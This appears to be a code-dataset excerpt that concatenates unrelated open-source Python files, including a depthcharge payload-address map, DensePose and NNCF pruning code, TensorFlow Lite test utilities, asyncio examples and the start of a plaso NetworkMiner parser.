triangle_index, point_index, _, _ = case
make_plot(triangle_index, point_index, args.save_plot)
if __name__ == "__main__":
seaborn.set() # Required in `seaborn >= 0.8`
main()
|
python/depthcharge/payload_map.py | justinforbes/depthcharge | 133 | 12750285 | <filename>python/depthcharge/payload_map.py
# SPDX-License-Identifier: BSD-3-Clause
# Depthcharge: <https://github.com/nccgroup/depthcharge>
"""
Implements PayloadMap - Although technically "public" this module
isn't documented in the API because its utility is tightly coupled
to internals of the Depthcharge class.
"""
from . import log
from . import builtin_payloads
from .operation import Operation
def _load_builtins(arch, payloads: list, exclude: set):
"""
Load built-in payloads into `payloads`, excluding any whose
names appear in the `exclude` set.
"""
for attr in dir(builtin_payloads):
if not isinstance(attr, str) or attr.startswith('_'):
continue
if attr in exclude:
continue
payload_dict = getattr(builtin_payloads, attr)
try:
payload = payload_dict[arch.name.lower()]
payloads.append((attr, payload))
except KeyError:
msg = 'Payload "{:s}" not implemented for {:s}'
log.warning(msg.format(attr, arch.name))
class PayloadMap:
"""
Tracks locations of deployed payloads.
The current implementation is simple and allocates space for all payloads,
even if they do not ultimately need to be deployed and used.
"""
def __init__(self, arch, base: int, **kwargs):
self._base = base
self._off = 0
self._map = {}
self._align = kwargs.get('align', 16)
self._skip_deploy = kwargs.get('skip_deploy', False)
exclude_builtins = kwargs.get('exclude_builtins', False)
excluded = kwargs.get('exclude', set())
payloads = []
# Aggregate built-in payloads
if not exclude_builtins:
_load_builtins(arch, payloads, excluded)
# Aggregate user-provided payloads
user_payloads = kwargs.get('payloads', None)
if user_payloads:
payloads += user_payloads
# Assign each payload to its corresponding location
for payload in payloads:
self.insert(payload[0], payload[1])
def insert(self, name: str, payload: bytes, required_by=None):
"""
Insert a `payload`, identified by `name`, into the PayloadMap.
This will assign it the next available address in the map.
If `required_by` is specified, the payload's association to an
:py:class:`depthcharge.Operation` subclass will be recorded. This
information can be provided later via :py:meth:`mark_required_by`.
Returns `True` if the payload added. If a payload with the same
name is already present, then `False` is returned. In this latter case,
The `required_by` information is still added to the corresponding
entry.
"""
if name not in self._map:
address = self._base + self._off
size = len(payload)
if self._align > 1:
self._off += size + (self._align - 1)
self._off = (self._off // self._align) * self._align
else:
self._off += size
self._map[name] = {
'address': address,
'deployed': False,
'skip_deploy': self._skip_deploy,
'data': payload,
'size': size,
'required_by': set()
}
else:
log.debug('{} is already in the PayloadMap'.format(name))
if required_by:
self.mark_required_by(name, required_by)
def __iter__(self):
return iter(self._map)
def __getitem__(self, name):
try:
return self._map[name]
except KeyError:
msg = 'No such payload registered in PayloadMap: "{}"'.format(name)
raise KeyError(msg)
@property
def base_address(self):
"""
This property specifies the base memory address at which payloads shall
be written to.
"""
return self._base
def mark_deployed(self, name, state=True):
"""
Mark the payload referred to by `name` as being deployed.
"""
payload = self._map[name]
payload['deployed'] = state
def mark_required_by(self, payload_name: str, operation):
"""
Mark the payload referred to by `name` as being required by
the specified `operation`, which may be the operation
name (str) or an instance of an Operation subclass.
A list of str or Operation instances is also permitted.
"""
if isinstance(operation, list):
for op_entry in operation:
self.mark_required_by(payload_name, op_entry)
return
if isinstance(operation, Operation):
operation = operation.name
elif not isinstance(operation, str):
msg = 'Expected operation argument to be str, Operation, or list. Got {:s}'
raise TypeError(msg.format(type(operation).__name__))
self._map[payload_name]['required_by'].add(operation)
|
fastrunner/utils/relation.py | FuxiongYang/faster | 227 | 12750334 | # !/usr/bin/python3
# -*- coding: utf-8 -*-
# @Author:梨花菜
# @File: relation.py
# @Time : 2019/5/27 10:16
# @Email: <EMAIL>
# @Software: PyCharm
# api模块和数据库api表relation对应关系
API_RELATION = {"default": 66,
"energy.ball": 67,
"manage": 68,
"app_manage": 68,
"artisan": 69,
"goods": 70,
"member": 71,
"order": 72,
"seller": 73,
"payment": 74,
"martketing": 75,
"promotion": 76,
"purchase": 77,
"security": 78,
"logistics": 79,
"recycle": 80,
"image-search": 81,
"content": 82,
"bmpm": 83,
"bi": 84
}
# Java同学项目分组
API_AUTHOR = {
"default": 1,
"tangzhu": 85,
"xuqirong": 86,
"zhanghengjian": 87,
"fengzhenwen": 88,
"lingyunlong": 89,
"chencanzhang": 90
}
NIL = '无参数'
SIGN = 'time,rode,sign'
SIGN_OR_TOKEN = SIGN + '(wb-token可选)'
SIGN_AND_TOKEN = SIGN + ',wb-token'
SESSION = 'cookie: wb_sess:xxxxxx'
COOKIE = 'cookie: wbiao.securityservice.tokenid:xxxx'
API_AUTH = {
"0": ["NIL", NIL],
"1": ["APP_GENERAL_AUTH", SIGN],
"2": ["WXMP_GENERAL_AUTH", SIGN],
"3": ["APP_MEMBER_AUTH", SIGN_AND_TOKEN],
"4": ["APP_MEMBER_COMPATIBILITY_AUTH", SIGN_OR_TOKEN],
"5": ["WXMP_MEMBER_AUTH", SIGN_AND_TOKEN],
"6": ["WXMP_MEMBER_COMPATIBILITY_AUTH", SIGN_OR_TOKEN],
"7": ["APP_USER_AUTH", SIGN_AND_TOKEN],
"8": ["APP_USER_COMPATIBILITY_AUTH", SIGN_OR_TOKEN],
"9": ["WXMP_USER_AUTH", SIGN_AND_TOKEN],
"10": ["WXMP_USER_COMPATIBILITY_AUTH", SIGN_OR_TOKEN],
"11": ["WXMP_MEMBER_COMPATIBILITY_AUTH", SESSION],
"12": ["PM_USER_AUTH", COOKIE],
"13": ["BACK_USER_AUTH", COOKIE],
"14": ["APP_NIL", NIL],
"15": ["WXMP_NIL", NIL],
"16": ["PM_NIL", NIL],
}
|
example/generic/get_exchange_info.py | bailzx5522/huobi_Python | 611 | 12750340 | <gh_stars>100-1000
from huobi.client.generic import GenericClient
from huobi.utils import *
generic_client = GenericClient()
list_obj = generic_client.get_exchange_info()
LogInfo.output("---- Supported symbols ----")
for symbol in list_obj.symbol_list:
LogInfo.output(symbol.symbol)
LogInfo.output("---- Supported currencies ----");
for currency in list_obj.currencies:
LogInfo.output(currency)
|
examples/source1.py | haypo/trollius | 175 | 12750354 | """Like source.py, but uses streams."""
from __future__ import print_function
import argparse
import sys
from trollius import *
from trollius import test_utils
ARGS = argparse.ArgumentParser(description="TCP data sink example.")
ARGS.add_argument(
'--tls', action='store_true', dest='tls',
default=False, help='Use TLS')
ARGS.add_argument(
'--iocp', action='store_true', dest='iocp',
default=False, help='Use IOCP event loop (Windows only)')
ARGS.add_argument(
'--stop', action='store_true', dest='stop',
default=False, help='Stop the server by sending it b"stop" as data')
ARGS.add_argument(
'--host', action='store', dest='host',
default='127.0.0.1', help='Host name')
ARGS.add_argument(
'--port', action='store', dest='port',
default=1111, type=int, help='Port number')
ARGS.add_argument(
'--size', action='store', dest='size',
default=16*1024, type=int, help='Data size')
class Debug:
"""A clever little class that suppresses repetitive messages."""
overwriting = False
label = 'stream1:'
def print_(self, *args):
if self.overwriting:
print(file=sys.stderr)
self.overwriting = 0
print(self.label, *args, file=sys.stderr)
def oprint(self, *args):
self.overwriting += 1
end = '\n'
if self.overwriting >= 3:
if self.overwriting == 3:
print(self.label, '[...]', file=sys.stderr)
end = '\r'
print(self.label, *args, file=sys.stderr, end=end)
sys.stdout.flush()
@coroutine
def start(loop, args):
d = Debug()
total = 0
sslctx = None
if args.tls:
d.print_('using dummy SSLContext')
sslctx = test_utils.dummy_ssl_context()
r, w = yield From(open_connection(args.host, args.port, ssl=sslctx))
d.print_('r =', r)
d.print_('w =', w)
if args.stop:
w.write(b'stop')
w.close()
else:
size = args.size
data = b'x'*size
try:
while True:
total += size
d.oprint('writing', size, 'bytes; total', total)
w.write(data)
f = w.drain()
if f:
d.print_('pausing')
yield From(f)
except (ConnectionResetError, BrokenPipeError) as exc:
d.print_('caught', repr(exc))
def main():
global args
args = ARGS.parse_args()
if args.iocp:
from trollius.windows_events import ProactorEventLoop
loop = ProactorEventLoop()
set_event_loop(loop)
else:
loop = get_event_loop()
try:
loop.run_until_complete(start(loop, args))
finally:
loop.close()
if __name__ == '__main__':
main()
|
conv-eng/conv.py | mjabrams/docs | 204 | 12750371 | import re
import sys
depRelHeader="""\
## %s : %s
"""
oneDepFig="""
<div class="sd-parse">
%s
%s(%s, %s)
</div>
"""
header="""\
---
layout: base
title: '%(relname)s'
shortdef : '%(shortdef)s'
---
"""
footer=""
### {\emph{advcl}: adverbial clause modifier}
relRe=re.compile(r"\{\\emph\{(.*?)\}:\s+(.*)\}\\\\$") #matches "advcl" and "adverb....ier" as two groups
### tabbing fig text
### \> ``Sam took out a 3 million dollar loan'' \> \> \emph{amod}(loan, dollar)\\
tabFigLine=re.compile(r"\\> +``(.*?)'' +\\> *\\> +\\emph\{(.*?)\}\((.*?), ?(.*?)\) *\\\\")
### \begin{deptext}[column sep=0.2em] Sam \&, \& my \& brother \& , \& arrived \\ \end{deptext}
depTextRe=re.compile(r"\\begin\{deptext\}(\[.*?\])? *(.*?)\\end\{deptext\}")
#\depedge[edge unit distance=0.5ex]{1}{4}{appos}
depEdgeRe=re.compile(r"\\depedge(\[.*?\])?\{([0-9]+)\}\{([0-9]+)\}\{(.*?)\}")
punctRe=re.compile(r"([.,!?])(?=( |$))")
class Relation:
"""I hold everything related to one relation in here, in case I want to
reorder them somehow, etc..."""
def __init__(self,name,definition):
self.name=name
self.definition=definition
self.text=depRelHeader%(name,definition)
def readDepFig(self,textIn):
# \begin{dependency}
# \begin{deptext}[column sep=0.2em]
# Sam \&, \& my \& brother \& , \& arrived \\
# \end{deptext}
# \depedge[edge unit distance=0.5ex]{1}{4}{appos}
# \end{dependency}
lines=""
while True:
line=textIn.next().strip()
if line==r"\end{dependency}":
break
lines+=" "+line
m=depTextRe.search(lines)
tokens=[t.strip() for t in m.group(2).replace(r"\\","").strip().split(r"\&")]
txt=" ".join(tokens)
self.text+="""\n\n<div class="sd-parse">\n"""
self.text+=txt+"\n"
for m in depEdgeRe.finditer(lines):
src=int(m.group(2))
target=int(m.group(3))
dType=m.group(4)
self.text+=dType+"("+tokens[src-1]+"-"+str(src)+", "+tokens[target-1]+"-"+str(target)+")\n"
self.text+="""</div>\n\n"""
def readTabbingFig(self,textIn):
while True:
line=textIn.next().strip()
if line.startswith(r"\hspace"):
continue
match=tabFigLine.match(line)
if match:
txt,dType,g,d=match.groups()
print >> sys.stderr, txt
txt=punctRe.sub(r" \1",txt).replace(r"\\","")
g=g.replace("\\","")
d=d.replace("\\","")
print >> sys.stderr, txt
print >> sys.stderr
self.text+=oneDepFig%(txt,dType,g,d)
continue
if line==r"\end{tabbing}":
return
print >> sys.stderr, "Spurious line: >>>"+line+"<<<"
def getText(self):
t=self.text
emphRe=re.compile(r"\\emph\{(.*?)\}")
t=emphRe.sub(r"*\1*",t)
quoteRe=re.compile(r"``(.*?)''")
t=quoteRe.sub(r'"\1"',t)
return t
relations={} #relType -> Relation()
currRel=None
while True:
try:
line=sys.stdin.next().strip()
except StopIteration: #Done!
break
#New relation?
match=relRe.search(line)
if match: #new relation
currRel=Relation(*match.groups())
assert currRel.name not in relations
relations[currRel.name]=currRel
continue
#Figure in tabbing?
if line.startswith(r"\begin{tabbing}"):
currRel.readTabbingFig(sys.stdin)
continue
if line.startswith(r"\begin{dependency}"):
currRel.readDepFig(sys.stdin)
continue
if line.startswith("%ENDRELS"):
break
if line.startswith("%") or line.startswith(r"\begin") or line.startswith(r"\end"):
continue
if currRel:
currRel.text+=line+" "
for r in sorted(relations):
f=open("../_en/"+r+".md","wt")
print >> f, header%{"relname":r,"shortdef":relations[r].definition}
print >> f, relations[r].getText()
print >> f, footer
f.close()
|
projects/DensePose/densepose/data/samplers/densepose_confidence_based.py | mmabrouk/detectron2 | 21,274 | 12750436 | # Copyright (c) Facebook, Inc. and its affiliates.
import random
from typing import Optional, Tuple
import torch
from densepose.converters import ToChartResultConverterWithConfidences
from .densepose_base import DensePoseBaseSampler
class DensePoseConfidenceBasedSampler(DensePoseBaseSampler):
"""
Samples DensePose data from DensePose predictions.
Samples for each class are drawn using confidence value estimates.
"""
def __init__(
self,
confidence_channel: str,
count_per_class: int = 8,
search_count_multiplier: Optional[float] = None,
search_proportion: Optional[float] = None,
):
"""
Constructor
Args:
confidence_channel (str): confidence channel to use for sampling;
possible values:
"sigma_2": confidences for UV values
"fine_segm_confidence": confidences for fine segmentation
"coarse_segm_confidence": confidences for coarse segmentation
(default: "sigma_2")
count_per_class (int): the sampler produces at most `count_per_class`
samples for each category (default: 8)
search_count_multiplier (float or None): if not None, the total number
of the most confident estimates of a given class to consider is
defined as `min(search_count_multiplier * count_per_class, N)`,
where `N` is the total number of estimates of the class; cannot be
specified together with `search_proportion` (default: None)
search_proportion (float or None): if not None, the total number of the
of the most confident estimates of a given class to consider is
defined as `min(max(search_proportion * N, count_per_class), N)`,
where `N` is the total number of estimates of the class; cannot be
specified together with `search_count_multiplier` (default: None)
"""
super().__init__(count_per_class)
self.confidence_channel = confidence_channel
self.search_count_multiplier = search_count_multiplier
self.search_proportion = search_proportion
assert (search_count_multiplier is None) or (search_proportion is None), (
f"Cannot specify both search_count_multiplier (={search_count_multiplier})"
f"and search_proportion (={search_proportion})"
)
def _produce_index_sample(self, values: torch.Tensor, count: int):
"""
Produce a sample of indices to select data based on confidences
Args:
values (torch.Tensor): an array of size [n, k] that contains
estimated values (U, V, confidences);
n: number of channels (U, V, confidences)
k: number of points labeled with part_id
count (int): number of samples to produce, should be positive and <= k
Return:
list(int): indices of values (along axis 1) selected as a sample
"""
k = values.shape[1]
if k == count:
index_sample = list(range(k))
else:
# take the best count * search_count_multiplier pixels,
# sample from them uniformly
# (here best = smallest variance)
_, sorted_confidence_indices = torch.sort(values[2])
if self.search_count_multiplier is not None:
search_count = min(int(count * self.search_count_multiplier), k)
elif self.search_proportion is not None:
search_count = min(max(int(k * self.search_proportion), count), k)
else:
search_count = min(count, k)
sample_from_top = random.sample(range(search_count), count)
index_sample = sorted_confidence_indices[:search_count][sample_from_top]
return index_sample
def _produce_labels_and_results(self, instance) -> Tuple[torch.Tensor, torch.Tensor]:
"""
Method to get labels and DensePose results from an instance, with confidences
Args:
instance (Instances): an instance of `DensePoseChartPredictorOutputWithConfidences`
Return:
labels (torch.Tensor): shape [H, W], DensePose segmentation labels
dp_result (torch.Tensor): shape [3, H, W], DensePose results u and v
stacked with the confidence channel
"""
converter = ToChartResultConverterWithConfidences
chart_result = converter.convert(instance.pred_densepose, instance.pred_boxes)
labels, dp_result = chart_result.labels.cpu(), chart_result.uv.cpu()
dp_result = torch.cat(
(dp_result, getattr(chart_result, self.confidence_channel)[None].cpu())
)
return labels, dp_result
|
tests/nonrealtime/test_nonrealtime_Session_pickle.py | butayama/supriya | 191 | 12750447 | <gh_stars>100-1000
import pickle
import supriya
def test_01():
old_session = supriya.Session()
new_session = pickle.loads(pickle.dumps(old_session))
old_bundles = old_session.to_osc_bundles()
new_bundles = new_session.to_osc_bundles()
assert old_bundles == new_bundles
def test_02():
old_session = supriya.Session()
group = old_session.add_group(offset=5)
group.add_synth(offset=10, duration=10)
new_session = pickle.loads(pickle.dumps(old_session))
old_bundles = old_session.to_osc_bundles()
new_bundles = new_session.to_osc_bundles()
assert old_bundles == new_bundles
|
silo/benchmarks/stats_runner.py | anshsarkar/TailBench | 274 | 12750454 | <reponame>anshsarkar/TailBench<filename>silo/benchmarks/stats_runner.py
#!/usr/bin/env python
import itertools as it
import platform
import math
import subprocess
import sys
import time
import multiprocessing as mp
import os
BUILDDIR='../out-perf.ectrs'
if __name__ == '__main__':
(_, out) = sys.argv
args = [
os.path.join(BUILDDIR, 'benchmarks/dbtest'),
'--bench-opts', '--workload-mix 0,0,100,0',
'--stats-server-sockfile' , '/tmp/silo.sock',
'--num-threads', '28',
'--numa-memory', '96G',
'--scale-factor', '160000',
'--parallel-loading',
'--runtime', '30',
]
env = dict(os.environ)
env['DISABLE_MADV_WILLNEED'] = '1'
p0 = subprocess.Popen(args, stdin=open('/dev/null', 'r'), stdout=open('/dev/null', 'w'), env=env)
time.sleep(1.0) # XXX: hacky
args = [os.path.join(BUILDDIR, 'stats_client'), '/tmp/silo.sock', 'dbtuple_bytes_allocated:dbtuple_bytes_freed']
with open(out, 'w') as fp:
p1 = subprocess.Popen(args, stdin=open('/dev/null', 'r'), stdout=fp)
p0.wait()
p1.wait()
|
tensorflow/lite/tools/test_utils.py | EricRemmerswaal/tensorflow | 190,993 | 12750496 | <reponame>EricRemmerswaal/tensorflow<filename>tensorflow/lite/tools/test_utils.py
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions that support testing.
All functions that can be commonly used by various tests.
"""
import flatbuffers
from tensorflow.lite.python import schema_py_generated as schema_fb
TFLITE_SCHEMA_VERSION = 3
def build_mock_flatbuffer_model():
"""Creates a flatbuffer containing an example model."""
builder = flatbuffers.Builder(1024)
schema_fb.BufferStart(builder)
buffer0_offset = schema_fb.BufferEnd(builder)
schema_fb.BufferStartDataVector(builder, 10)
builder.PrependUint8(9)
builder.PrependUint8(8)
builder.PrependUint8(7)
builder.PrependUint8(6)
builder.PrependUint8(5)
builder.PrependUint8(4)
builder.PrependUint8(3)
builder.PrependUint8(2)
builder.PrependUint8(1)
builder.PrependUint8(0)
buffer1_data_offset = builder.EndVector(10)
schema_fb.BufferStart(builder)
schema_fb.BufferAddData(builder, buffer1_data_offset)
buffer1_offset = schema_fb.BufferEnd(builder)
schema_fb.BufferStart(builder)
buffer2_offset = schema_fb.BufferEnd(builder)
schema_fb.ModelStartBuffersVector(builder, 3)
builder.PrependUOffsetTRelative(buffer2_offset)
builder.PrependUOffsetTRelative(buffer1_offset)
builder.PrependUOffsetTRelative(buffer0_offset)
buffers_offset = builder.EndVector(3)
string0_offset = builder.CreateString('input_tensor')
schema_fb.TensorStartShapeVector(builder, 3)
builder.PrependInt32(1)
builder.PrependInt32(2)
builder.PrependInt32(5)
shape0_offset = builder.EndVector(3)
schema_fb.TensorStart(builder)
schema_fb.TensorAddName(builder, string0_offset)
schema_fb.TensorAddShape(builder, shape0_offset)
schema_fb.TensorAddType(builder, 0)
schema_fb.TensorAddBuffer(builder, 0)
tensor0_offset = schema_fb.TensorEnd(builder)
schema_fb.QuantizationParametersStartMinVector(builder, 5)
builder.PrependFloat32(0.5)
builder.PrependFloat32(2.0)
builder.PrependFloat32(5.0)
builder.PrependFloat32(10.0)
builder.PrependFloat32(20.0)
quant1_min_offset = builder.EndVector(5)
schema_fb.QuantizationParametersStartMaxVector(builder, 5)
builder.PrependFloat32(10.0)
builder.PrependFloat32(20.0)
builder.PrependFloat32(-50.0)
builder.PrependFloat32(1.0)
builder.PrependFloat32(2.0)
quant1_max_offset = builder.EndVector(5)
schema_fb.QuantizationParametersStartScaleVector(builder, 5)
builder.PrependFloat32(3.0)
builder.PrependFloat32(4.0)
builder.PrependFloat32(5.0)
builder.PrependFloat32(6.0)
builder.PrependFloat32(7.0)
quant1_scale_offset = builder.EndVector(5)
schema_fb.QuantizationParametersStartZeroPointVector(builder, 5)
builder.PrependInt64(1)
builder.PrependInt64(2)
builder.PrependInt64(3)
builder.PrependInt64(-1)
builder.PrependInt64(-2)
quant1_zero_point_offset = builder.EndVector(5)
schema_fb.QuantizationParametersStart(builder)
schema_fb.QuantizationParametersAddMin(builder, quant1_min_offset)
schema_fb.QuantizationParametersAddMax(builder, quant1_max_offset)
schema_fb.QuantizationParametersAddScale(builder, quant1_scale_offset)
schema_fb.QuantizationParametersAddZeroPoint(builder,
quant1_zero_point_offset)
quantization1_offset = schema_fb.QuantizationParametersEnd(builder)
string1_offset = builder.CreateString('constant_tensor')
schema_fb.TensorStartShapeVector(builder, 3)
builder.PrependInt32(1)
builder.PrependInt32(2)
builder.PrependInt32(5)
shape1_offset = builder.EndVector(3)
schema_fb.TensorStart(builder)
schema_fb.TensorAddName(builder, string1_offset)
schema_fb.TensorAddShape(builder, shape1_offset)
schema_fb.TensorAddType(builder, 0)
schema_fb.TensorAddBuffer(builder, 1)
schema_fb.TensorAddQuantization(builder, quantization1_offset)
tensor1_offset = schema_fb.TensorEnd(builder)
string2_offset = builder.CreateString('output_tensor')
schema_fb.TensorStartShapeVector(builder, 3)
builder.PrependInt32(1)
builder.PrependInt32(2)
builder.PrependInt32(5)
shape2_offset = builder.EndVector(3)
schema_fb.TensorStart(builder)
schema_fb.TensorAddName(builder, string2_offset)
schema_fb.TensorAddShape(builder, shape2_offset)
schema_fb.TensorAddType(builder, 0)
schema_fb.TensorAddBuffer(builder, 2)
tensor2_offset = schema_fb.TensorEnd(builder)
schema_fb.SubGraphStartTensorsVector(builder, 3)
builder.PrependUOffsetTRelative(tensor2_offset)
builder.PrependUOffsetTRelative(tensor1_offset)
builder.PrependUOffsetTRelative(tensor0_offset)
tensors_offset = builder.EndVector(3)
schema_fb.SubGraphStartInputsVector(builder, 1)
builder.PrependInt32(0)
inputs_offset = builder.EndVector(1)
schema_fb.SubGraphStartOutputsVector(builder, 1)
builder.PrependInt32(2)
outputs_offset = builder.EndVector(1)
schema_fb.OperatorCodeStart(builder)
schema_fb.OperatorCodeAddBuiltinCode(builder, schema_fb.BuiltinOperator.ADD)
schema_fb.OperatorCodeAddDeprecatedBuiltinCode(builder,
schema_fb.BuiltinOperator.ADD)
schema_fb.OperatorCodeAddVersion(builder, 1)
code_offset = schema_fb.OperatorCodeEnd(builder)
schema_fb.ModelStartOperatorCodesVector(builder, 1)
builder.PrependUOffsetTRelative(code_offset)
codes_offset = builder.EndVector(1)
schema_fb.OperatorStartInputsVector(builder, 2)
builder.PrependInt32(0)
builder.PrependInt32(1)
op_inputs_offset = builder.EndVector(2)
schema_fb.OperatorStartOutputsVector(builder, 1)
builder.PrependInt32(2)
op_outputs_offset = builder.EndVector(1)
schema_fb.OperatorStart(builder)
schema_fb.OperatorAddOpcodeIndex(builder, 0)
schema_fb.OperatorAddInputs(builder, op_inputs_offset)
schema_fb.OperatorAddOutputs(builder, op_outputs_offset)
op_offset = schema_fb.OperatorEnd(builder)
schema_fb.SubGraphStartOperatorsVector(builder, 1)
builder.PrependUOffsetTRelative(op_offset)
ops_offset = builder.EndVector(1)
string3_offset = builder.CreateString('subgraph_name')
schema_fb.SubGraphStart(builder)
schema_fb.SubGraphAddName(builder, string3_offset)
schema_fb.SubGraphAddTensors(builder, tensors_offset)
schema_fb.SubGraphAddInputs(builder, inputs_offset)
schema_fb.SubGraphAddOutputs(builder, outputs_offset)
schema_fb.SubGraphAddOperators(builder, ops_offset)
subgraph_offset = schema_fb.SubGraphEnd(builder)
schema_fb.ModelStartSubgraphsVector(builder, 1)
builder.PrependUOffsetTRelative(subgraph_offset)
subgraphs_offset = builder.EndVector(1)
signature_key = builder.CreateString('my_key')
input_tensor_string = builder.CreateString('input_tensor')
output_tensor_string = builder.CreateString('output_tensor')
# Signature Inputs
schema_fb.TensorMapStart(builder)
schema_fb.TensorMapAddName(builder, input_tensor_string)
schema_fb.TensorMapAddTensorIndex(builder, 1)
input_tensor = schema_fb.TensorMapEnd(builder)
# Signature Outputs
schema_fb.TensorMapStart(builder)
schema_fb.TensorMapAddName(builder, output_tensor_string)
schema_fb.TensorMapAddTensorIndex(builder, 2)
output_tensor = schema_fb.TensorMapEnd(builder)
schema_fb.SignatureDefStartInputsVector(builder, 1)
builder.PrependUOffsetTRelative(input_tensor)
signature_inputs_offset = builder.EndVector(1)
schema_fb.SignatureDefStartOutputsVector(builder, 1)
builder.PrependUOffsetTRelative(output_tensor)
signature_outputs_offset = builder.EndVector(1)
schema_fb.SignatureDefStart(builder)
schema_fb.SignatureDefAddSignatureKey(builder, signature_key)
schema_fb.SignatureDefAddInputs(builder, signature_inputs_offset)
schema_fb.SignatureDefAddOutputs(builder, signature_outputs_offset)
signature_offset = schema_fb.SignatureDefEnd(builder)
schema_fb.ModelStartSignatureDefsVector(builder, 1)
builder.PrependUOffsetTRelative(signature_offset)
signature_defs_offset = builder.EndVector(1)
string4_offset = builder.CreateString('model_description')
schema_fb.ModelStart(builder)
schema_fb.ModelAddVersion(builder, TFLITE_SCHEMA_VERSION)
schema_fb.ModelAddOperatorCodes(builder, codes_offset)
schema_fb.ModelAddSubgraphs(builder, subgraphs_offset)
schema_fb.ModelAddDescription(builder, string4_offset)
schema_fb.ModelAddBuffers(builder, buffers_offset)
schema_fb.ModelAddSignatureDefs(builder, signature_defs_offset)
model_offset = schema_fb.ModelEnd(builder)
builder.Finish(model_offset)
model = builder.Output()
return model
def load_model_from_flatbuffer(flatbuffer_model):
"""Loads a model as a python object from a flatbuffer model."""
model = schema_fb.Model.GetRootAsModel(flatbuffer_model, 0)
model = schema_fb.ModelT.InitFromObj(model)
return model
def build_mock_model():
"""Creates an object containing an example model."""
model = build_mock_flatbuffer_model()
return load_model_from_flatbuffer(model)
|
django_quicky/namegen/__init__.py | sametmax/django-quicky | 149 | 12750504 | <gh_stars>100-1000
import pkg_resources
pkg_resources.declare_namespace(__name__)
from .namegen import NameGenerator
namegen = NameGenerator()
|
indent.py | Hengle/MemoryProfiler | 184 | 12750526 | <reponame>Hengle/MemoryProfiler<filename>indent.py
#!/usr/bin/env python3
import os
import os.path as p
def iter_dir(base_path:str, indent:str):
node_list = os.listdir(base_path)
for n in range(len(node_list)):
name = node_list[n]
nest_path = p.join(base_path, name)
if n + 1 < len(node_list):
print('{}├─{}'.format(indent, name))
else:
print('{}└─{}'.format(indent, name))
if p.isdir(nest_path):
if n + 1 < len(node_list):
iter_dir(nest_path, indent=indent + '│ ')
else:
iter_dir(nest_path, indent=indent + ' ')
if __name__ == '__main__':
iter_dir('memory', '') |
tests/torch/pruning/filter_pruning/test_set_pruning_rate.py | sarthakpati/nncf | 310 | 12750555 | <reponame>sarthakpati/nncf<gh_stars>100-1000
"""
Copyright (c) 2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pytest
import numpy as np
from nncf.torch.pruning.filter_pruning.algo import FilterPruningController
from tests.torch.helpers import create_compressed_model_and_algo_for_test
from tests.torch.helpers import check_correct_nncf_modules_replacement
from tests.torch.pruning.helpers import get_basic_pruning_config
from tests.torch.pruning.helpers import BigPruningTestModel
def create_pruning_algo_with_config(config):
"""
Create filter_pruning with default params.
:param config: config for the algorithm
:return pruned model, pruning_algo, nncf_modules
"""
config['compression']['algorithm'] = 'filter_pruning'
model = BigPruningTestModel()
pruned_model, pruning_algo = create_compressed_model_and_algo_for_test(BigPruningTestModel(), config)
# Check that all modules was correctly replaced by NNCF modules and return this NNCF modules
_, nncf_modules = check_correct_nncf_modules_replacement(model, pruned_model)
return pruned_model, pruning_algo, nncf_modules
@pytest.mark.parametrize(
('all_weights', 'pruning_rate_to_set', 'ref_pruning_rates', 'ref_global_pruning_rate'),
[
(False, 0.5, [0.5, 0.5], 0.5),
(True, 0.5, [0.28125, 0.60937], 0.5),
(False, {0: 0.6, 1: 0.8}, [0.5, 0.75], 0.69986),
]
)
def test_setting_pruning_rate(all_weights, pruning_rate_to_set, ref_pruning_rates, ref_global_pruning_rate):
"""
Test setting global and groupwise pruning rates via the set_pruning_rate method.
"""
# Creating algorithm with empty config
config = get_basic_pruning_config(input_sample_size=[1, 1, 8, 8])
config['compression']['pruning_init'] = 0.2
config['compression']['params']['all_weights'] = all_weights
_, pruning_controller, _ = create_pruning_algo_with_config(config)
assert isinstance(pruning_controller, FilterPruningController)
pruning_controller.set_pruning_rate(pruning_rate_to_set)
groupwise_pruning_rates = list(pruning_controller.current_groupwise_pruning_rate.values())
assert np.isclose(groupwise_pruning_rates, ref_pruning_rates).all()
assert np.isclose(pruning_controller.pruning_rate, ref_global_pruning_rate).all()
def test_can_set_compression_rate_in_filter_pruning_algo():
"""
Test setting the global pruning rate via the compression_rate property.
"""
# Creating algorithm with empty config
config = get_basic_pruning_config(input_sample_size=[1, 1, 8, 8])
config['compression']['pruning_init'] = 0.2
_, pruning_controller, _ = create_pruning_algo_with_config(config)
pruning_controller.compression_rate = 0.65
assert pytest.approx(pruning_controller.compression_rate, 1e-2) == 0.65
|
plaso/parsers/networkminer.py | cugu-stars/plaso | 1,253 | 12750565 | <filename>plaso/parsers/networkminer.py
# -*- coding: utf-8 -*-
"""Parser for NetworkMiner .fileinfos files."""
from dfdatetime import time_elements as dfdatetime_time_elements
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import definitions
from plaso.parsers import dsv_parser
from plaso.parsers import manager
class NetworkMinerEventData(events.EventData):
"""NetworkMiner event Data.
Attributes:
destination_ip (str): Destination IP address.
destination_port (str): Destination port number.
file_details (string): Details about the file.
file_md5 (string): MD5 hash of the file.
file_path (string): File path to where it was downloaded.
file_size (string): Size of the file.
filename (string): Name of the file.
source_ip (str): Originating IP address.
source_port (str): Originating port number.
"""
DATA_TYPE = 'networkminer:fileinfos:file'
def __init__(self):
super(NetworkMinerEventData, self).__init__(data_type=self.DATA_TYPE)
self.destination_ip = None
self.destination_port = None
self.file_details = None
self.file_md5 = None
self.file_path = None
self.file_size = None
self.filename = None
self.source_ip = None
self.source_port = None
class NetworkMinerParser(dsv_parser.DSVParser):
"""Parser for NetworkMiner .fileinfos files."""
NAME = 'networkminer_fileinfo'
